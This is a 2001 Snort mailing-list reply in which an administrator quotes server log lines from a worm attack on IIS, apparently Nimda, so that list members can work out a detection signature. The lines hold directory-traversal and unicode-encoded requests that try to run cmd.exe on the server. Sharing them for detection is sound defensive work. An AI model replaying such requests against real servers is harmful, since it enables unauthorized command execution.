Re: WEB-IIS Cmd attack

[Erek Adams <erek () theadamsfamily net>]

On Tue, 18 Sep 2001, cdowns wrote:

> What is the actual signiture as i have seen nothing yet on my servers in
> NH

Give it time, give it time....

What I'm seeing is the following:

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:24 -0700] "GET /c/winnt/system32/cmd.exe?
/c+dir HTTP/1.0" 404 297 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:24 -0700] "GET /d/winnt/system32/cmd.exe?
/c+dir HTTP/1.0" 404 297 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /scripts/..%255c../winnt
/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /_vti_bin/..%255c..
/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /_mem_bin/..%255c..
/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:34 -0700] "GET /msadc/..%255c../..%255c..
/..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 344 "-" "-"

xxx.yyy.zzz.1 - - [18/Sep/2001:09:02:37 -0700] "GET /scripts/..%c1%1c../winnt
/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 "-" "-"

And repeats, ad nausem.

There are some others, but basically still just your standard unicode string
attack.

Damn...  This one looks worse than CR.  *sigh*

-----
Erek Adams
Nifty-Type-Guy
TheAdamsFamily.Net


_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users